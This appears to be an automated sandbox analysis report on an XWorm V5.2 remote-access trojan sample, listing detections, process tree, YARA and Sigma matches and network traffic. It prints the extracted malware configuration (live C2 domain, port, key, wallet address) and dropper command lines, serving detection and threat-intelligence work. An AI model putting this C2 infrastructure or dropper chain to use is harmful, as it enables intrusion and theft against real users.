Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x.exe

Overview

General Information

Sample name:x.exe
Analysis ID:1504726
MD5:98a2d7aee74efe11a83e1514199a1346
SHA1:758365522b6a9eebe7ec5a10f4f260d3ffcd285a
SHA256:0e079477b2c5072f876fabdd5339ce96ed42a55361fb445d1c9bbe1282bf4850
Tags:BudMyMenexe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains suspicious base64 encoded strings
.NET source code contains very large strings
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Command shell drops VBS files
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Machine Learning detection for dropped file
Machine Learning detection for sample
Potential malicious VBS script found (has network functionality)
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • x.exe (PID: 5556 cmdline: "C:\Users\user\Desktop\x.exe" MD5: 98A2D7AEE74EFE11A83E1514199A1346)
    • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6496 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • findstr.exe (PID: 4368 cmdline: findstr /e "'v" "C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cscript.exe (PID: 1272 cmdline: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • x.exe (PID: 5808 cmdline: C:\Users\user\AppData\Local\Temp\x.exe MD5: 74D8F5A1E068A454FFAA5C8FD32A3E44)
        • WerFault.exe (PID: 2788 cmdline: C:\Windows\system32\WerFault.exe -u -p 5808 -s 2288 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "character-acquisitions.gl.at.ply.gg"], "Port": "36301", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\Hoodbyunlock.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\ProgramData\Hoodbyunlock.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\ProgramData\Hoodbyunlock.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xc6fc:$s6: VirtualBox
      • 0xc65a:$s8: Win32_ComputerSystem
      • 0xeeac:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xef49:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xf05e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xe2e0:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Local\Temp\x.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Local\Temp\x.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          Click to see the 1 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xd58c:$s6: VirtualBox
            • 0xd4ea:$s8: Win32_ComputerSystem
            • 0xfd5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xfdf9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xff0e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xf190:$cnc4: POST / HTTP/1.1
            00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xe67c:$s6: VirtualBox
              • 0xe5da:$s8: Win32_ComputerSystem
              • 0x10e2c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x10ec9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x10fde:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x10260:$cnc4: POST / HTTP/1.1
              00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                Click to see the 14 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                6.3.cscript.exe.2a3f8e09dd0.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  6.3.cscript.exe.2a3f8e09dd0.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0xc7bc:$s6: VirtualBox
                  • 0xc71a:$s8: Win32_ComputerSystem
                  • 0xef8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0xf029:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0xf13e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0xe3c0:$cnc4: POST / HTTP/1.1
                  6.3.cscript.exe.2a3f8e09dd0.4.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    6.3.cscript.exe.2a3f8e09dd0.4.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xc7bc:$s6: VirtualBox
                    • 0xc71a:$s8: Win32_ComputerSystem
                    • 0xef8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0xf029:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0xf13e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xe3c0:$cnc4: POST / HTTP/1.1
                    6.3.cscript.exe.2a3f8d843d0.2.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      Click to see the 31 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Script Interpreter Execution From Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6496, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 1272, ProcessName: cscript.exe
                      Sigma detected: Suspicious Script Execution From Temp Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6496, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 1272, ProcessName: cscript.exe
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6496, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 1272, ProcessName: cscript.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5808, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hoodbyunlock.lnk
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6496, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 1272, ProcessName: cscript.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-05T11:15:25.670475+020028559241Malware Command and Control Activity Detected192.168.2.549722147.185.221.1736301TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: x.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: character-acquisitions.gl.at.ply.ggAvira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\ProgramData\Hoodbyunlock.exeAvira: detection malicious, Label: TR/Agent.hcyxx
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Agent.hcyxx
                      Found malware configuration
                      Source: 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "character-acquisitions.gl.at.ply.gg"], "Port": "36301", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
                      Multi AV Scanner detection for domain / URL
                      Source: character-acquisitions.gl.at.ply.ggVirustotal: Detection: 10%Perma Link
                      Source: character-acquisitions.gl.at.ply.ggVirustotal: Detection: 10%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\ProgramData\Hoodbyunlock.exeReversingLabs: Detection: 73%
                      Source: C:\ProgramData\Hoodbyunlock.exeVirustotal: Detection: 77%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 73%
                      Source: C:\Users\user\AppData\Local\Temp\x.exeVirustotal: Detection: 77%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: x.exeReversingLabs: Detection: 65%
                      Source: x.exeVirustotal: Detection: 55%Perma Link
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\ProgramData\Hoodbyunlock.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: x.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: 7.2.x.exe.128a1a78.1.raw.unpackString decryptor: 127.0.0.1,character-acquisitions.gl.at.ply.gg
                      Source: 7.2.x.exe.128a1a78.1.raw.unpackString decryptor: 36301
                      Source: 7.2.x.exe.128a1a78.1.raw.unpackString decryptor: <123456789>
                      Source: 7.2.x.exe.128a1a78.1.raw.unpackString decryptor: <Xwormmm>
                      Source: 7.2.x.exe.128a1a78.1.raw.unpackString decryptor: XWorm V5.2
                      Source: 7.2.x.exe.128a1a78.1.raw.unpackString decryptor: USB.exe
                      Source: 7.2.x.exe.128a1a78.1.raw.unpackString decryptor: %ProgramData%
                      Source: 7.2.x.exe.128a1a78.1.raw.unpackString decryptor: Hoodbyunlock.exe
                      Source: 7.2.x.exe.128a1a78.1.raw.unpackString decryptor: BTC_Address
                      Source: 7.2.x.exe.128a1a78.1.raw.unpackString decryptor: 0x9eF91c246cC47EdFB8857bd1631c50A4D93c1aC6
                      Source: 7.2.x.exe.128a1a78.1.raw.unpackString decryptor: TRC20_Address
                      Source: x.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: x.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: x.exe, 00000007.00000002.3111404709.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb` source: x.exe, 00000007.00000002.3111404709.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: lib.pdb source: x.exe, 00000007.00000002.3111404709.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Drawing.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.pdbL+ source: x.exe, 00000007.00000002.3113363388.000000001B807000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Xml.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: 0C:\Windows\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Core.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.pdb.> source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.pdb source: x.exe, 00000007.00000002.3113363388.000000001B750000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000007.00000002.3111404709.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, WER93E4.tmp.dmp.11.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: x.exe, 00000007.00000002.3113363388.000000001B7D3000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Drawing.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Management.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Management.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: x.exe, 00000007.00000002.3113363388.000000001B7D3000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.pdbH source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: indoC:\Windows\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49722 -> 147.185.221.17:36301
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 127.0.0.1
                      Source: Malware configuration extractorURLs: character-acquisitions.gl.at.ply.gg
                      Potential malicious VBS script found (has network functionality)
                      Source: C:\Windows\System32\cmd.exeDropped file: b.SaveToFile p+"\x.exe",2'vJump to dropped file
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.x.exe.560000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.x.exe.128a1a78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\ProgramData\Hoodbyunlock.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.5:49722 -> 147.185.221.17:36301
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 147.185.221.17 147.185.221.17
                      Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                      Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: character-acquisitions.gl.at.ply.gg
                      Source: x.exe, 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: cscript.exe, 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, Hoodbyunlock.exe.7.dr, x.exe.6.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: x.exe, 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
                      Source: x.exe, 00000000.00000002.2152277122.0000000003071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dehoisted/Bat2Exe
                      Source: x.exeString found in binary or memory: https://github.com/dehoisted/Bat2Exeg
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      Operating System Destruction

                      barindex
                      Protects its processes via BreakOnTermination flag
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: 01 00 00 00 Jump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 6.3.cscript.exe.2a3f8e09dd0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 6.3.cscript.exe.2a3f8e09dd0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 6.3.cscript.exe.2a3f936cf80.5.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 7.2.x.exe.128a1a78.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 7.0.x.exe.560000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 6.3.cscript.exe.2a3f8e09dd0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 6.3.cscript.exe.2a3f8e09dd0.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000006.00000003.2145801874.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\ProgramData\Hoodbyunlock.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      .NET source code contains suspicious base64 encoded strings
